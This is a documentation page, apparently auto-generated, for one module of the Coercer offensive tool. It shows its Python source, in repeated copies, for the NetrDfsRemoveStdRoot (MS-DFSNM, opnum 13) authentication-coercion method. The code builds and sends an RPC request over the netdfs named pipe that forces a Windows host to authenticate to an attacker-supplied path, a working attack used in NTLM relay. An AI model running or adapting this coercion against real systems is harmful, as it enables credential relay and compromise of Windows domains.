coercer.methods.MS_DFSNM.NetrDfsRemoveStdRoot

 1#!/usr/bin/env python3
 2# -*- coding: utf-8 -*-
 3# File name          : NetrDfsRemoveStdRootResponse.py
 4# Author             : Podalirius (@podalirius_)
 5# Date created       : 14 Sep 2022
 6
 7from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
 8from coercer.network.DCERPCSessionError import DCERPCSessionError
 9from coercer.core.utils import gen_random_name
10from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
11from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID
12
13
14class _NetrDfsRemoveStdRoot(NDRCALL):
15    """
16    Structure to make the RPC call to NetrDfsRemoveStdRoot() in MS-DFSNM Protocol
17    """
18    opnum = 13
19    structure = (
20        ('ServerName', WSTR),  # Type: WCHAR *
21        ('RootShare', WSTR),   # Type: WCHAR *
22        ('ApiFlags', DWORD)    # Type: DWORD
23    )
24
25
26class _NetrDfsRemoveStdRootResponse(NDRCALL):
27    """
28    Structure to parse the response of the RPC call to NetrDfsRemoveStdRoot() in MS-DFSNM Protocol
29    """
30    structure = ()
31
32
33class NetrDfsRemoveStdRoot(MSPROTOCOLRPCCALL):
34    """
35    Coercing a machine to authenticate using function NetrDfsRemoveStdRoot (opnum 13) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979)
36
37    Method found by:
38     - [@filip_dragovic](https://twitter.com/filip_dragovic)
39    """
40
41    access = {
42        "ncan_np": [
43            {
44                "namedpipe": r"\PIPE\netdfs",
45                "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
46                "version": "3.0"
47            }
48        ]
49    }
50
51    protocol = {
52        "longname": "[MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol",
53        "shortname": "MS-DFSNM"
54    }
55
56    function = {
57        "name": "NetrDfsRemoveStdRoot",
58        "opnum": 13,
59        "vulnerable_arguments": ["ServerName"]
60    }
61
62    def trigger(self, dcerpc_session):
63        if dcerpc_session is not None:
64            try:
65                request = _NetrDfsRemoveStdRoot()
66                request['ServerName'] = self.path
67                request['RootShare'] = gen_random_name() + '\x00'
68                request['ApiFlags'] = 0
69                resp = dcerpc_session.request(request)
70                return ""
71            except Exception as err:
72                return err
73        else:
74            print("[!] Error: dce is None, you must call connect() first.")
75            return None
class NetrDfsRemoveStdRoot(coercer.models.MSPROTOCOLRPCCALL.MSPROTOCOLRPCCALL):
34class NetrDfsRemoveStdRoot(MSPROTOCOLRPCCALL):
35    """
36    Coercing a machine to authenticate using function NetrDfsRemoveStdRoot (opnum 13) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979)
37
38    Method found by:
39     - [@filip_dragovic](https://twitter.com/filip_dragovic)
40    """
41
42    access = {
43        "ncan_np": [
44            {
45                "namedpipe": r"\PIPE\netdfs",
46                "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
47                "version": "3.0"
48            }
49        ]
50    }
51
52    protocol = {
53        "longname": "[MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol",
54        "shortname": "MS-DFSNM"
55    }
56
57    function = {
58        "name": "NetrDfsRemoveStdRoot",
59        "opnum": 13,
60        "vulnerable_arguments": ["ServerName"]
61    }
62
63    def trigger(self, dcerpc_session):
64        if dcerpc_session is not None:
65            try:
66                request = _NetrDfsRemoveStdRoot()
67                request['ServerName'] = self.path
68                request['RootShare'] = gen_random_name() + '\x00'
69                request['ApiFlags'] = 0
70                resp = dcerpc_session.request(request)
71                return ""
72            except Exception as err:
73                return err
74        else:
75            print("[!] Error: dce is None, you must call connect() first.")
76            return None

Coercing a machine to authenticate using function NetrDfsRemoveStdRoot (opnum 13) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979)

Method found by:

def trigger(self, dcerpc_session):
63    def trigger(self, dcerpc_session):
64        if dcerpc_session is not None:
65            try:
66                request = _NetrDfsRemoveStdRoot()
67                request['ServerName'] = self.path
68                request['RootShare'] = gen_random_name() + '\x00'
69                request['ApiFlags'] = 0
70                resp = dcerpc_session.request(request)
71                return ""
72            except Exception as err:
73                return err
74        else:
75            print("[!] Error: dce is None, you must call connect() first.")
76            return None